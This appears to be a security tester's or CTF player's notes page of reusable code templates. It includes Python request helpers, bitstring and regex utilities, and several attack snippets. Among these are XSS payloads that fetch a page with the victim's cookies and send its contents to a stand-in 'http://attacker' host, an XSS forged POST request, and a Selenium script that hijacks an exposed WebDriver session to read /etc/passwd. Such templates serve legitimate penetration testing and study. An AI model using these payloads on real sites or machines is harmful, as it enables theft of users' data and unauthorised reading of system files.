Templates

Post request with session

import requests
import re

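http_proxy  = "http://127.0.0.1:8080"
# Proxy map handed to requests.  Only the "http" scheme is routed through the
# local intercepting proxy; a TLS target needs its own "https" entry or its
# traffic silently bypasses the proxy.
proxyDict = {
    "http": http_proxy,
}
# get a session: the first request is expected to set a PHPSESSID cookie.
# ('http://' is a placeholder; replace it with the page that starts a session.)
# The proxy is applied here as well so the session set-up is also visible in it.
r = requests.get('http://', proxies=proxyDict)
# Fail with a clear message instead of an opaque KeyError when the server did
# not set the cookie we are about to replay.
session_cookie = r.cookies.get('PHPSESSID')
if session_cookie is None:
    raise RuntimeError("first response did not set a PHPSESSID cookie")
# send request, replaying the captured session cookie explicitly
r = requests.post(
    '<url>',
    data={'key': 'value'},
    cookies={'PHPSESSID': session_cookie},
    proxies=proxyDict,
)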

XSS web request on behalf of the victim, sending the complete web page back

// Request <target_url> from inside the victim's browser and, once it has
// loaded, forward the raw response body as the query string of a second
// request to <our_url>.  Neither xhr nor x is declared with var/let, so both
// become page-global variables visible to any other script on the page.
xhr = new XMLHttpRequest();
xhr.onload = function() {
  // Runs after the first request completes; xhr.response is the page text.
  x = new XMLHttpRequest();
  // The response is appended to the URL without any encoding.
  x.open("GET", '<our_url>?'+xhr.response);
  x.send(null);
}
xhr.open("GET", '<target_url>');
xhr.send(null);

Alternative using fetch:

// fetch() form of the same idea: read http://target with the victim's
// credentials and POST the base64 of the body to http://attacker.  The
// commented-out `/*+btoa(r)*/` is a leftover from a query-string variant and
// has no effect; the data travels in the POST body instead.
fetch('http://target', { credentials: 'include'}).then(res=>res.text()).then((r)=>fetch("http://attacker/?x="/*+btoa(r)*/,{credentials: 'include', "method":"POST", "body":btoa(r)}));

XSS post request on behalf of the victim, with custom cookies

// Send a form-encoded POST to <target uri> from the victim's browser after
// setting a cookie on the current document via document.cookie.
var xhr = new XMLHttpRequest();
document.cookie = "key=value;";
var uri ="<target uri>";
// NOTE: this second assignment discards the XMLHttpRequest created above;
// only one object is needed.
xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);  // third argument: asynchronous request
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("<post body>");

Manipulate bitstring

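# Convert bit string to byte array
def bitstring_to_bytes(s):
    """Convert a string of '0'/'1' characters to the bytes it encodes.

    Bits are read big-endian (the first character is the most significant
    bit) and packed into ``ceil(len(s) / 8)`` bytes, so leading zero bytes
    are preserved: ``"0000000011111111"`` -> ``b"\\x00\\xff"``.  A string
    whose length is not a multiple of 8 is left-padded with zero bits.

    Args:
        s: the bit string; an empty string yields ``b""``.

    Returns:
        The packed bytes.

    Raises:
        ValueError: if ``s`` contains characters other than '0' and '1'.
    """
    if not s:
        return b""
    # int(s, 2) would also accept whitespace, underscores and a "0b" prefix,
    # which would throw off the width computed from len(s); reject them here.
    if set(s) - {"0", "1"}:
        raise ValueError("bit string may only contain '0' and '1'")
    # to_bytes keeps the width explicit instead of dropping leading zero bytes
    # the way a shift-and-append loop does.
    return int(s, 2).to_bytes((len(s) + 7) // 8, "big")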

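base = "010101..."  # the bit string (placeholder: fill in a real run of 0/1 characters)
n = 8  # change something every n bits
# Iterate over the bit string, doing something every n bits.  Chunks are
# collected and joined once instead of being concatenated inside the loop.
# NOTE(review): as in the original template the loop starts at offset n and
# stops n bits before the end, so the first and last chunks are not visited;
# use range(0, len(base), n) if every chunk should be processed.
chunks = []
for i in range(n, len(base) - n, n):
    chunk = base[i:i + n]  # the n-bit slice starting at i
    # do manipulation here (replace or transform `chunk`)
    chunks.append(chunk)
result = "".join(chunks)
print(bitstring_to_bytes(result))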

Named capture groups

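# Named capture group: find "e : <digits>" in the decoded text.  The group is
# optional, so m.groupdict() always contains the key 'e' (mapped to None when
# the digits are absent); testing `'e' in m.groupdict()` was therefore always
# true and int(None) would raise TypeError.  Test the group's value instead.
# The raw string keeps `\s` and `\d` from being treated as invalid escapes.
m = re.search(r'[e]\s:\s(?P<e>\d+)?', text.decode('utf-8'))
if m is not None and m.group('e') is not None:
    e = int(m.group('e'))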

Use Selenium to read local files

'''
curl -d '{"capabilities": {"firstMatch": [{"browserName": "firefox", "moz:firefoxOptions": {"args": [ "-headless"], "log": {"level": "trace"}}}]}}' http://127.0.0.1:41145/session
'''
from selenium import webdriver
from selenium.webdriver.remote.webdriver import WebDriver

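def attach_to_session(executor_url, session_id):
    """Return a ``webdriver.Remote`` bound to an already-running WebDriver session.

    ``webdriver.Remote`` always issues a ``newSession`` command when it is
    constructed.  ``WebDriver.execute`` is temporarily replaced so that this
    one command is answered with a canned response carrying ``session_id``
    instead of starting a new browser; every other command is forwarded to
    the original ``execute``.

    Args:
        executor_url: base URL of the WebDriver server (the endpoint used by
            the curl command above).
        session_id: id of the existing session to attach to.

    Returns:
        A driver whose ``session_id`` is ``session_id``.

    Note:
        The patch is class-wide and not thread-safe: a ``Remote`` constructed
        on another thread while this runs would also receive the canned
        session.  The patch is undone even when the constructor raises.
    """
    original_execute = WebDriver.execute

    def new_command_execute(self, command, params=None):
        # Short-circuit only the session-creation command; pass everything
        # else through so the driver keeps talking to the real server.
        if command == "newSession":
            return {'success': 0, 'value': None, 'sessionId': session_id}
        return original_execute(self, command, params)

    WebDriver.execute = new_command_execute
    try:
        driver = webdriver.Remote(command_executor=executor_url, desired_capabilities={})
    finally:
        # Restore the real execute even if Remote() raises; otherwise every
        # later driver created in this process would silently reuse session_id.
        WebDriver.execute = original_execute
    driver.session_id = session_id
    return driver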

# Attach to the session on the same host/port as the curl command above
# (the id is presumably the one returned by that command) and drive the
# browser that is already running there.
bro = attach_to_session('http://127.0.0.1:41145', 'bb2d2142-8a61-446b-9bcc-16751ce20b49')
# A file:// URL is read by the browser on the machine where it runs, not by
# this script -- so a reachable WebDriver port amounts to local file read on
# its host; keep such endpoints bound to loopback and never expose them.
bro.get('file:///etc/passwd')
print(bro.page_source)
